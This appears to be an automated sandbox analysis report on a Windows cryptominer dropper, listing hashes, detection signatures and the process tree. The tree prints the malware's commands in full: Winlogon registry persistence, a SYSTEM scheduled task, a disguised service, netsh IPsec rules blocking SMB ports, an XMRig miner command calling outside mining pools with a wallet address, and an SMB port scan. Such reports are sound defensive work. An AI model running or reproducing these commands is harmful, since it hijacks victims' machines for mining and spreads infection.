Analysis
-
max time kernel
151s -
max time network
155s -
platform
windows10-2004_x64 -
resource
win10v2004-20220414-en -
submitted
19-05-2022 01:41
Behavioral task
behavioral1
Sample
aa.exe
Resource
win7-20220414-en
Behavioral task
behavioral2
Sample
aa.exe
Resource
win10v2004-20220414-en
General
-
Target
aa.exe
-
Size
28.1MB
-
MD5
f9b2e96e5044fdaa7d923d516f6206e8
-
SHA1
936f9c88a574fede2fd37e54189e4b69c1215163
-
SHA256
b8a09b445da4d1904cd5b184ffbf3e994ab137360131f89af3c08e3e9756c63a
-
SHA512
c4e622c9e88c5cef755abbc08db1368bc4656e80a349e5920566c003d7f800d0a4cf1f3164d18a87f42d5269f39089f2a2d0894f622fbede0930b66a827c77a1
Malware Config
Signatures
-
Modifies WinLogon for persistence 2 TTPs 1 IoCs
Processes:
awtqnk.exedescription ioc process Set value (str) \REGISTRY\MACHINE\SOFTWARE\WOW6432Node\Microsoft\Windows NT\CurrentVersion\Winlogon\shell = "Explorer.exe C:\\Windows\\rNcAd\\awtqnk.exe" awtqnk.exe -
Detected Stratum cryptominer command
Looks to be attempting to contact Stratum mining pool.
-
XMRig Miner Payload 6 IoCs
Processes:
resource yara_rule C:\Windows\rNcAd\awtqnk.exe xmrig C:\Windows\rNcAd\awtqnk.exe xmrig behavioral2/memory/4992-134-0x0000000000400000-0x0000000002054000-memory.dmp xmrig behavioral2/memory/3684-175-0x0000000000400000-0x0000000002054000-memory.dmp xmrig C:\Windows\rNcAd\ss.exe xmrig behavioral2/memory/2628-179-0x0000000000400000-0x0000000000B4B000-memory.dmp xmrig -
Creates new service(s) 1 TTPs
-
Executes dropped EXE 3 IoCs
Processes:
awtqnk.exess.exesvchost.exepid process 3684 awtqnk.exe 2628 ss.exe 1052 svchost.exe -
Checks computer location settings 2 TTPs 1 IoCs
Looks up country code configured in the registry, likely geofence.
Processes:
awtqnk.exedescription ioc process Key value queried \REGISTRY\USER\S-1-5-21-3751123196-3323558407-1869646069-1000\Control Panel\International\Geo\Nation awtqnk.exe -
Drops file in Windows directory 64 IoCs
Processes:
awtqnk.exeaa.exedescription ioc process File created C:\Windows\rNcAd\cnli-1.dll awtqnk.exe File created C:\Windows\rNcAd\iconv.dll awtqnk.exe File created C:\Windows\rNcAd\libxml2.dll awtqnk.exe File created C:\Windows\rNcAd\pcrecpp-0.dll awtqnk.exe File created C:\Windows\rNcAd\cnli-0.dll awtqnk.exe File created C:\Windows\rNcAd\libiconv-2.dll awtqnk.exe File created C:\Windows\rNcAd\pcre-0.dll awtqnk.exe File created C:\Windows\rNcAd\ssleay32.dll awtqnk.exe File created C:\Windows\rNcAd\Cstr.fb awtqnk.exe File created C:\Windows\rNcAd\qdx.bat awtqnk.exe File created C:\Windows\rNcAd\chrome..xml awtqnk.exe File created C:\Windows\rNcAd\coli-0.dll awtqnk.exe File created C:\Windows\rNcAd\etebCore-2.x86.dll awtqnk.exe File created C:\Windows\rNcAd\posh-0.dll awtqnk.exe File created C:\Windows\rNcAd\trfo-2.dll awtqnk.exe File created C:\Windows\rNcAd\awtqnk.exe aa.exe File created C:\Windows\rNcAd\etchCore-0.x86.dll awtqnk.exe File created C:\Windows\rNcAd\crli-0.dll awtqnk.exe File created C:\Windows\rNcAd\dmgd-1.dll awtqnk.exe File created C:\Windows\rNcAd\TFf awtqnk.exe File created C:\Windows\rNcAd\adfw-2.dll awtqnk.exe File created C:\Windows\rNcAd\eteb-2.dll awtqnk.exe File created C:\Windows\rNcAd\exma-1.dll awtqnk.exe File created C:\Windows\boy.exe aa.exe File created C:\Windows\rNcAd\esco-0.dll awtqnk.exe File created C:\Windows\rNcAd\etch-0.dll awtqnk.exe File created C:\Windows\rNcAd\libcurl.dll awtqnk.exe File created C:\Windows\rNcAd\trfo-0.dll awtqnk.exe File created C:\Windows\rNcAd\zibe.dll awtqnk.exe File created C:\Windows\rNcAd\ip.dll awtqnk.exe File created C:\Windows\rNcAd\chrome..exe awtqnk.exe File created C:\Windows\rNcAd\tucl-1.dll awtqnk.exe File opened for modification C:\Windows\rNcAd\tscl.html awtqnk.exe File created C:\Windows\rNcAd\Cstr.xml awtqnk.exe File created C:\Windows\end.bat awtqnk.exe File created C:\Windows\rNcAd\chrome..fb awtqnk.exe File created C:\Windows\rNcAd\etebCore-2.x64.dll awtqnk.exe File created C:\Windows\rNcAd\zlib1.dll awtqnk.exe File created C:\Windows\rNcAd\svchost.exe awtqnk.exe File opened for modification C:\Windows\end.bat awtqnk.exe File created C:\Windows\rNcAd\ss.exe awtqnk.exe File created C:\Windows\rNcAd\tucl.dll awtqnk.exe File created C:\Windows\rNcAd\WinRing0x64.sys awtqnk.exe File created C:\Windows\rNcAd\trch-0.dll awtqnk.exe File created C:\Windows\rNcAd\pcreposix-0.dll awtqnk.exe File created C:\Windows\rNcAd\posh.dll awtqnk.exe File created C:\Windows\rNcAd\tibe.dll awtqnk.exe File created C:\Windows\rNcAd\trch-1.dll awtqnk.exe File created C:\Windows\rNcAd\trfo.dll awtqnk.exe File created C:\Windows\rNcAd\s.bat awtqnk.exe File created C:\Windows\rNcAd\dmgd-4.dll awtqnk.exe File created C:\Windows\rNcAd\libeay32.dll awtqnk.exe File created C:\Windows\rNcAd\tibe-2.dll awtqnk.exe File created C:\Windows\rNcAd\tscl.html aa.exe File created C:\Windows\rNcAd\adfw.dll awtqnk.exe File created C:\Windows\rNcAd\etchCore-0.x64.dll awtqnk.exe File created C:\Windows\rNcAd\pcla-0.dll awtqnk.exe File created C:\Windows\rNcAd\riar.dll awtqnk.exe File created C:\Windows\rNcAd\riar-2.dll awtqnk.exe File created C:\Windows\rNcAd\tibe-1.dll awtqnk.exe File created C:\Windows\rNcAd\trch.dll awtqnk.exe File created C:\Windows\rNcAd\Cstr.exe awtqnk.exe File created C:\Windows\rNcAd\xdvl-0.dll awtqnk.exe File created C:\Windows\rNcAd\ucl.dll awtqnk.exe -
Launches sc.exe
Sc.exe is a Windows utlilty to control services on the system.
-
Enumerates physical storage devices 1 TTPs
Attempts to interact with connected storage/optical drive(s). Likely ransomware behaviour.
-
Creates scheduled task(s) 1 TTPs 1 IoCs
Schtasks is often used by malware for persistence or to perform post-infection execution.
-
Suspicious behavior: EnumeratesProcesses 64 IoCs
Processes:
awtqnk.exepid process 3684 awtqnk.exe 3684 awtqnk.exe 3684 awtqnk.exe 3684 awtqnk.exe 3684 awtqnk.exe 3684 awtqnk.exe 3684 awtqnk.exe 3684 awtqnk.exe 3684 awtqnk.exe 3684 awtqnk.exe 3684 awtqnk.exe 3684 awtqnk.exe 3684 awtqnk.exe 3684 awtqnk.exe 3684 awtqnk.exe 3684 awtqnk.exe 3684 awtqnk.exe 3684 awtqnk.exe 3684 awtqnk.exe 3684 awtqnk.exe 3684 awtqnk.exe 3684 awtqnk.exe 3684 awtqnk.exe 3684 awtqnk.exe 3684 awtqnk.exe 3684 awtqnk.exe 3684 awtqnk.exe 3684 awtqnk.exe 3684 awtqnk.exe 3684 awtqnk.exe 3684 awtqnk.exe 3684 awtqnk.exe 3684 awtqnk.exe 3684 awtqnk.exe 3684 awtqnk.exe 3684 awtqnk.exe 3684 awtqnk.exe 3684 awtqnk.exe 3684 awtqnk.exe 3684 awtqnk.exe 3684 awtqnk.exe 3684 awtqnk.exe 3684 awtqnk.exe 3684 awtqnk.exe 3684 awtqnk.exe 3684 awtqnk.exe 3684 awtqnk.exe 3684 awtqnk.exe 3684 awtqnk.exe 3684 awtqnk.exe 3684 awtqnk.exe 3684 awtqnk.exe 3684 awtqnk.exe 3684 awtqnk.exe 3684 awtqnk.exe 3684 awtqnk.exe 3684 awtqnk.exe 3684 awtqnk.exe 3684 awtqnk.exe 3684 awtqnk.exe 3684 awtqnk.exe 3684 awtqnk.exe 3684 awtqnk.exe 3684 awtqnk.exe -
Suspicious use of AdjustPrivilegeToken 2 IoCs
Processes:
ss.exedescription pid process Token: SeLockMemoryPrivilege 2628 ss.exe Token: SeLockMemoryPrivilege 2628 ss.exe -
Suspicious use of SetWindowsHookEx 4 IoCs
Processes:
aa.exeawtqnk.exepid process 4992 aa.exe 4992 aa.exe 3684 awtqnk.exe 3684 awtqnk.exe -
Suspicious use of WriteProcessMemory 64 IoCs
Processes:
aa.exeawtqnk.execmd.execmd.execmd.exedescription pid process target process PID 4992 wrote to memory of 3684 4992 aa.exe awtqnk.exe PID 4992 wrote to memory of 3684 4992 aa.exe awtqnk.exe PID 4992 wrote to memory of 3684 4992 aa.exe awtqnk.exe PID 4992 wrote to memory of 3628 4992 aa.exe cmd.exe PID 4992 wrote to memory of 3628 4992 aa.exe cmd.exe PID 4992 wrote to memory of 3628 4992 aa.exe cmd.exe PID 3684 wrote to memory of 2796 3684 awtqnk.exe cmd.exe PID 3684 wrote to memory of 2796 3684 awtqnk.exe cmd.exe PID 3684 wrote to memory of 2796 3684 awtqnk.exe cmd.exe PID 2796 wrote to memory of 2344 2796 cmd.exe netsh.exe PID 2796 wrote to memory of 2344 2796 cmd.exe netsh.exe PID 2796 wrote to memory of 2344 2796 cmd.exe netsh.exe PID 2796 wrote to memory of 752 2796 cmd.exe netsh.exe PID 2796 wrote to memory of 752 2796 cmd.exe netsh.exe PID 2796 wrote to memory of 752 2796 cmd.exe netsh.exe PID 2796 wrote to memory of 900 2796 cmd.exe netsh.exe PID 2796 wrote to memory of 900 2796 cmd.exe netsh.exe PID 2796 wrote to memory of 900 2796 cmd.exe netsh.exe PID 2796 wrote to memory of 5088 2796 cmd.exe netsh.exe PID 2796 wrote to memory of 5088 2796 cmd.exe netsh.exe PID 2796 wrote to memory of 5088 2796 cmd.exe netsh.exe PID 2796 wrote to memory of 4716 2796 cmd.exe netsh.exe PID 2796 wrote to memory of 4716 2796 cmd.exe netsh.exe PID 2796 wrote to memory of 4716 2796 cmd.exe netsh.exe PID 2796 wrote to memory of 4768 2796 cmd.exe netsh.exe PID 2796 wrote to memory of 4768 2796 cmd.exe netsh.exe PID 2796 wrote to memory of 4768 2796 cmd.exe netsh.exe PID 2796 wrote to memory of 1476 2796 cmd.exe netsh.exe PID 2796 wrote to memory of 1476 2796 cmd.exe netsh.exe PID 2796 wrote to memory of 1476 2796 cmd.exe netsh.exe PID 2796 wrote to memory of 4356 2796 cmd.exe netsh.exe PID 2796 wrote to memory of 4356 2796 cmd.exe netsh.exe PID 2796 wrote to memory of 4356 2796 cmd.exe netsh.exe PID 2796 wrote to memory of 3328 2796 cmd.exe netsh.exe PID 2796 wrote to memory of 3328 2796 cmd.exe netsh.exe PID 2796 wrote to memory of 3328 2796 cmd.exe netsh.exe PID 2796 wrote to memory of 2012 2796 cmd.exe netsh.exe PID 2796 wrote to memory of 2012 2796 cmd.exe netsh.exe PID 2796 wrote to memory of 2012 2796 cmd.exe netsh.exe PID 3684 wrote to memory of 1060 3684 awtqnk.exe cmd.exe PID 3684 wrote to memory of 1060 3684 awtqnk.exe cmd.exe PID 3684 wrote to memory of 1060 3684 awtqnk.exe cmd.exe PID 3684 wrote to memory of 932 3684 awtqnk.exe cmd.exe PID 3684 wrote to memory of 932 3684 awtqnk.exe cmd.exe PID 3684 wrote to memory of 932 3684 awtqnk.exe cmd.exe PID 1060 wrote to memory of 1764 1060 cmd.exe netsh.exe PID 1060 wrote to memory of 1764 1060 cmd.exe netsh.exe PID 1060 wrote to memory of 1764 1060 cmd.exe netsh.exe PID 932 wrote to memory of 3140 932 cmd.exe netsh.exe PID 932 wrote to memory of 3140 932 cmd.exe netsh.exe PID 932 wrote to memory of 3140 932 cmd.exe netsh.exe PID 1060 wrote to memory of 4484 1060 cmd.exe netsh.exe PID 1060 wrote to memory of 4484 1060 cmd.exe netsh.exe PID 1060 wrote to memory of 4484 1060 cmd.exe netsh.exe PID 1060 wrote to memory of 216 1060 cmd.exe netsh.exe PID 1060 wrote to memory of 216 1060 cmd.exe netsh.exe PID 1060 wrote to memory of 216 1060 cmd.exe netsh.exe PID 932 wrote to memory of 240 932 cmd.exe netsh.exe PID 932 wrote to memory of 240 932 cmd.exe netsh.exe PID 932 wrote to memory of 240 932 cmd.exe netsh.exe PID 1060 wrote to memory of 1448 1060 cmd.exe netsh.exe PID 1060 wrote to memory of 1448 1060 cmd.exe netsh.exe PID 1060 wrote to memory of 1448 1060 cmd.exe netsh.exe PID 932 wrote to memory of 3704 932 cmd.exe netsh.exe
Processes
-
C:\Users\Admin\AppData\Local\Temp\aa.exe"C:\Users\Admin\AppData\Local\Temp\aa.exe"1⤵
- Drops file in Windows directory
- Suspicious use of SetWindowsHookEx
- Suspicious use of WriteProcessMemory
-
C:\Windows\rNcAd\awtqnk.exeC:\Windows\rNcAd\awtqnk.exe2⤵
- Modifies WinLogon for persistence
- Executes dropped EXE
- Checks computer location settings
- Drops file in Windows directory
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of SetWindowsHookEx
- Suspicious use of WriteProcessMemory
-
C:\Windows\SysWOW64\cmd.exeC:\Windows\system32\cmd.exe /c ""C:\Windows\end.bat" "3⤵
- Suspicious use of WriteProcessMemory
-
C:\Windows\SysWOW64\netsh.exenetsh ipsec static add policy name=ipsec_ply4⤵
-
C:\Windows\SysWOW64\netsh.exenetsh ipsec static add filterlist name=deny_pt4⤵
-
C:\Windows\SysWOW64\netsh.exenetsh ipsec static add filterlist name=allow_pt4⤵
-
C:\Windows\SysWOW64\netsh.exenetsh ipsec static add filter filterlist=deny_pt srcaddr=any dstaddr=ME dstport=445 protocol=TCP4⤵
-
C:\Windows\SysWOW64\netsh.exenetsh ipsec static add filter filterlist=deny_pt srcaddr=any dstaddr=ME dstport=139 protocol=TCP4⤵
-
C:\Windows\SysWOW64\netsh.exenetsh ipsec static add filteraction name=deny action=block4⤵
-
C:\Windows\SysWOW64\netsh.exenetsh ipsec static add filteraction name=allow action=negotiate4⤵
-
C:\Windows\SysWOW64\netsh.exenetsh ipsec static add rule name=deny policy=ipsec_ply filterlist=deny_pt filteraction=deny4⤵
-
C:\Windows\SysWOW64\netsh.exenetsh ipsec static add rule name=allow policy=ipsec_ply filterlist=allow_pt filteraction=allow psk="(@=P#$bV4$"4⤵
-
C:\Windows\SysWOW64\netsh.exenetsh ipsec static set policy name=ipsec_ply assign=y4⤵
-
C:\Windows\SysWOW64\cmd.exeC:\Windows\system32\cmd.exe /c ""C:\Windows\end.bat" "3⤵
- Suspicious use of WriteProcessMemory
-
C:\Windows\SysWOW64\netsh.exenetsh ipsec static add policy name=ipsec_ply4⤵
-
C:\Windows\SysWOW64\netsh.exenetsh ipsec static add filterlist name=deny_pt4⤵
-
C:\Windows\SysWOW64\netsh.exenetsh ipsec static add filterlist name=allow_pt4⤵
-
C:\Windows\SysWOW64\netsh.exenetsh ipsec static add filter filterlist=deny_pt srcaddr=any dstaddr=ME dstport=445 protocol=TCP4⤵
-
C:\Windows\SysWOW64\netsh.exenetsh ipsec static add filter filterlist=deny_pt srcaddr=any dstaddr=ME dstport=139 protocol=TCP4⤵
-
C:\Windows\SysWOW64\netsh.exenetsh ipsec static add filteraction name=deny action=block4⤵
-
C:\Windows\SysWOW64\netsh.exenetsh ipsec static add filteraction name=allow action=negotiate4⤵
-
C:\Windows\SysWOW64\netsh.exenetsh ipsec static add rule name=deny policy=ipsec_ply filterlist=deny_pt filteraction=deny4⤵
-
C:\Windows\SysWOW64\netsh.exenetsh ipsec static add rule name=allow policy=ipsec_ply filterlist=allow_pt filteraction=allow psk="(@=P#$bV4$"4⤵
-
C:\Windows\SysWOW64\netsh.exenetsh ipsec static set policy name=ipsec_ply assign=y4⤵
-
C:\Windows\SysWOW64\cmd.exeC:\Windows\system32\cmd.exe /c ""C:\Windows\end.bat" "3⤵
- Suspicious use of WriteProcessMemory
-
C:\Windows\SysWOW64\netsh.exenetsh ipsec static add policy name=ipsec_ply4⤵
-
C:\Windows\SysWOW64\netsh.exenetsh ipsec static add filterlist name=deny_pt4⤵
-
C:\Windows\SysWOW64\netsh.exenetsh ipsec static add filterlist name=allow_pt4⤵
-
C:\Windows\SysWOW64\netsh.exenetsh ipsec static add filter filterlist=deny_pt srcaddr=any dstaddr=ME dstport=445 protocol=TCP4⤵
-
C:\Windows\SysWOW64\netsh.exenetsh ipsec static add filter filterlist=deny_pt srcaddr=any dstaddr=ME dstport=139 protocol=TCP4⤵
-
C:\Windows\SysWOW64\netsh.exenetsh ipsec static add filteraction name=deny action=block4⤵
-
C:\Windows\SysWOW64\netsh.exenetsh ipsec static add filteraction name=allow action=negotiate4⤵
-
C:\Windows\SysWOW64\netsh.exenetsh ipsec static add rule name=deny policy=ipsec_ply filterlist=deny_pt filteraction=deny4⤵
-
C:\Windows\SysWOW64\netsh.exenetsh ipsec static add rule name=allow policy=ipsec_ply filterlist=allow_pt filteraction=allow psk="(@=P#$bV4$"4⤵
-
C:\Windows\SysWOW64\netsh.exenetsh ipsec static set policy name=ipsec_ply assign=y4⤵
-
C:\Windows\SysWOW64\cmd.exeC:\Windows\system32\cmd.exe /c ""C:\Windows\end.bat" "3⤵
-
C:\Windows\SysWOW64\sc.exesc.exe Create "Application Layre Gateway Saervice" type= own type= interact start= demand DisplayName= "Can not be deledted" binPath= "cmd.exe /c start "C:\Windows\boy.exe"3⤵
-
C:\Windows\SysWOW64\cmd.exeC:\Windows\system32\cmd.exe /c ""C:\Windows\rNcAd\qdx.bat" "3⤵
-
C:\Windows\SysWOW64\schtasks.exeschtasks.exe /create /TN "\Microsoft\Windows\UPnP\Services" /RU SYSTEM /TR "C:\Windows\rNcAd\awtqnk.exe" /SC ONSTART4⤵
- Creates scheduled task(s)
-
C:\Windows\rNcAd\ss.exe"C:\Windows\rNcAd\ss.exe" -o stratum+tcp://wk.monerogx.com:6502 -o stratum+tcp://note.monerogx.com:8666 -o stratum+tcp://wk.sdffdasdfsdfaczxfwd53.org:5555 -u 44FaSvDWdKAB2R3n1XUZnjavNWwXEvyixVP8FhmccbNC6TGuCs4R937YWuoewbbSmMEsEJuYzqUwucVHhW73DwXo4ttSdNS -p x -k --donate-level=13⤵
- Executes dropped EXE
- Suspicious use of AdjustPrivilegeToken
-
C:\Windows\SysWOW64\cmd.exeC:\Windows\system32\cmd.exe /c ""C:\Windows\rNcAd\s.bat" "3⤵
-
C:\Windows\rNcAd\svchost.exesvchost.exe syn 10.127.0.0 10.127.255.255 445 /save4⤵
- Executes dropped EXE
-
C:\Windows\SysWOW64\cmd.execmd.exe /c del "C:\Users\Admin\AppData\Local\Temp\aa.exe"2⤵
Network
MITRE ATT&CK Matrix ATT&CK v6
Replay Monitor
Loading Replay Monitor...
Downloads
-
C:\Windows\end.batFilesize
1KB
MD5c017d5f762ae5d67efb7d099b53cca58
SHA1ab7f8553de7614251d76ce54aaee52f1a35e7ae6
SHA256d8b897a896d21dfea7d901a57aa9cb5aa17a6bf02db1570a7d856680e3b3847b
SHA512856dc8f6e94b1211ac84505e1e3350fda32d43583f9ec2e12fa7821c68376278220921cd2bffa9b562d6b0ed09f3dc9f674d830c7475e3d39def48e41563af78
-
C:\Windows\end.batFilesize
1KB
MD5c017d5f762ae5d67efb7d099b53cca58
SHA1ab7f8553de7614251d76ce54aaee52f1a35e7ae6
SHA256d8b897a896d21dfea7d901a57aa9cb5aa17a6bf02db1570a7d856680e3b3847b
SHA512856dc8f6e94b1211ac84505e1e3350fda32d43583f9ec2e12fa7821c68376278220921cd2bffa9b562d6b0ed09f3dc9f674d830c7475e3d39def48e41563af78
-
C:\Windows\rNcAd\awtqnk.exeFilesize
28.1MB
MD5f9b2e96e5044fdaa7d923d516f6206e8
SHA1936f9c88a574fede2fd37e54189e4b69c1215163
SHA256b8a09b445da4d1904cd5b184ffbf3e994ab137360131f89af3c08e3e9756c63a
SHA512c4e622c9e88c5cef755abbc08db1368bc4656e80a349e5920566c003d7f800d0a4cf1f3164d18a87f42d5269f39089f2a2d0894f622fbede0930b66a827c77a1
-
C:\Windows\rNcAd\awtqnk.exeFilesize
28.1MB
MD5f9b2e96e5044fdaa7d923d516f6206e8
SHA1936f9c88a574fede2fd37e54189e4b69c1215163
SHA256b8a09b445da4d1904cd5b184ffbf3e994ab137360131f89af3c08e3e9756c63a
SHA512c4e622c9e88c5cef755abbc08db1368bc4656e80a349e5920566c003d7f800d0a4cf1f3164d18a87f42d5269f39089f2a2d0894f622fbede0930b66a827c77a1
-
C:\Windows\rNcAd\qdx.batFilesize
116B
MD5662ee857ad37429cc2fe7e71d45f531f
SHA13c467a477716fab2a1a6cbeac3bc373b9e52b278
SHA25662d500efc31c01d724bf59838c705325928bff3b06b96399ff4611eb9f594414
SHA512c2e4a3a07a82b0750bde87c6a2b39fc781d6ff604914198a3be688e3707dd5ffeb59cf19775d7d39ee2ddd770ecf26d94dcae5a85c6b17853dfca592668595f5
-
C:\Windows\rNcAd\s.batFilesize
335B
MD5b5f17481d6d186362e1b989d59f4485b
SHA1286e596314689831c647c43a2d7258e7704062bb
SHA25692d3d97610deea1906de9c1303e5928808d65c1bb6b0653613e13c0fa81a91f5
SHA5125918ae4392e4b7b381426cd121478e12e2f7abbab3bbdeba5f383231aaff25436442f34a8735bc8efa3ab422650cccaf03fcaf22d627a0c10e5e1adbdacb9698
-
C:\Windows\rNcAd\ss.exeFilesize
6.7MB
MD58460b86a434521fe122230467dffc2a5
SHA1f7bd0696c9201d5270cb75deb82895a85a5298a2
SHA256812a448e4023b2b7b52dffe30e72b77b96b4f334263e1b0f2daad8e33a68143d
SHA512fb6504aed5c99010faa00332eecdf2916393490b79b8819a1e338238fd0f21e7255550e3155fc0efbe2295858df84ffe1f703eaf9ffdd824406f80d2c7fe58dc
-
C:\Windows\rNcAd\svchost.exeFilesize
14KB
MD5c097fd043d3cbabcada0878505c7afa5
SHA1966a60028a3a24268c049ffadbe1a07b83de24ce
SHA2561328bd220d9b4baa8a92b8d3f42f0d123762972d1dfc4b1fd4b4728d67b01dfc
SHA5120837c537af0c75d5ce06d3ae6e0c6eefe3901535c908843d3771cd468657bca2e3c103b8a84c7c43f2cf1410782a595151fffc3c78fdc0f81277ed4894397fb0
-
C:\Windows\rNcAd\svchost.exeFilesize
14KB
MD5c097fd043d3cbabcada0878505c7afa5
SHA1966a60028a3a24268c049ffadbe1a07b83de24ce
SHA2561328bd220d9b4baa8a92b8d3f42f0d123762972d1dfc4b1fd4b4728d67b01dfc
SHA5120837c537af0c75d5ce06d3ae6e0c6eefe3901535c908843d3771cd468657bca2e3c103b8a84c7c43f2cf1410782a595151fffc3c78fdc0f81277ed4894397fb0
-
C:\Windows\rNcAd\tscl.htmlFilesize
6B
MD5bfc6fd80246ce526a70a1042bf4331ea
SHA190f0d40ca76df58f7a2cd7207fc0eadea62e41f9
SHA256b3034d9341c8d2a4ee4183d392e65cc683292ec318f881860f66fb6ee4a90066
SHA5123306e4020203416c699e0317aea05db1927fe8aa9da9dee1a712d6eaf650b9231a57ff84b4d31a242f766294590b354658c235c79e8442473ff021e2fce28538
-
memory/216-153-0x0000000000000000-mapping.dmp
-
memory/240-154-0x0000000000000000-mapping.dmp
-
memory/648-164-0x0000000000000000-mapping.dmp
-
memory/752-138-0x0000000000000000-mapping.dmp
-
memory/872-165-0x0000000000000000-mapping.dmp
-
memory/876-169-0x0000000000000000-mapping.dmp
-
memory/900-139-0x0000000000000000-mapping.dmp
-
memory/932-148-0x0000000000000000-mapping.dmp
-
memory/1052-182-0x0000000000000000-mapping.dmp
-
memory/1052-185-0x0000000000400000-0x000000000040E000-memory.dmpFilesize
56KB
-
memory/1056-163-0x0000000000000000-mapping.dmp
-
memory/1060-147-0x0000000000000000-mapping.dmp
-
memory/1312-170-0x0000000000000000-mapping.dmp
-
memory/1448-155-0x0000000000000000-mapping.dmp
-
memory/1476-143-0x0000000000000000-mapping.dmp
-
memory/1608-168-0x0000000000000000-mapping.dmp
-
memory/1764-150-0x0000000000000000-mapping.dmp
-
memory/1828-174-0x0000000000000000-mapping.dmp
-
memory/2012-146-0x0000000000000000-mapping.dmp
-
memory/2304-158-0x0000000000000000-mapping.dmp
-
memory/2344-137-0x0000000000000000-mapping.dmp
-
memory/2628-179-0x0000000000400000-0x0000000000B4B000-memory.dmpFilesize
7.3MB
-
memory/2628-177-0x0000000000000000-mapping.dmp
-
memory/2796-135-0x0000000000000000-mapping.dmp
-
memory/2864-172-0x0000000000000000-mapping.dmp
-
memory/3140-151-0x0000000000000000-mapping.dmp
-
memory/3192-180-0x0000000000000000-mapping.dmp
-
memory/3236-157-0x0000000000000000-mapping.dmp
-
memory/3328-145-0x0000000000000000-mapping.dmp
-
memory/3628-133-0x0000000000000000-mapping.dmp
-
memory/3684-175-0x0000000000400000-0x0000000002054000-memory.dmpFilesize
28.3MB
-
memory/3684-130-0x0000000000000000-mapping.dmp
-
memory/3704-156-0x0000000000000000-mapping.dmp
-
memory/3720-161-0x0000000000000000-mapping.dmp
-
memory/4316-162-0x0000000000000000-mapping.dmp
-
memory/4356-144-0x0000000000000000-mapping.dmp
-
memory/4428-171-0x0000000000000000-mapping.dmp
-
memory/4484-152-0x0000000000000000-mapping.dmp
-
memory/4716-141-0x0000000000000000-mapping.dmp
-
memory/4768-142-0x0000000000000000-mapping.dmp
-
memory/4812-166-0x0000000000000000-mapping.dmp
-
memory/4856-159-0x0000000000000000-mapping.dmp
-
memory/4904-167-0x0000000000000000-mapping.dmp
-
memory/4992-134-0x0000000000400000-0x0000000002054000-memory.dmpFilesize
28.3MB
-
memory/5072-160-0x0000000000000000-mapping.dmp
-
memory/5088-140-0x0000000000000000-mapping.dmp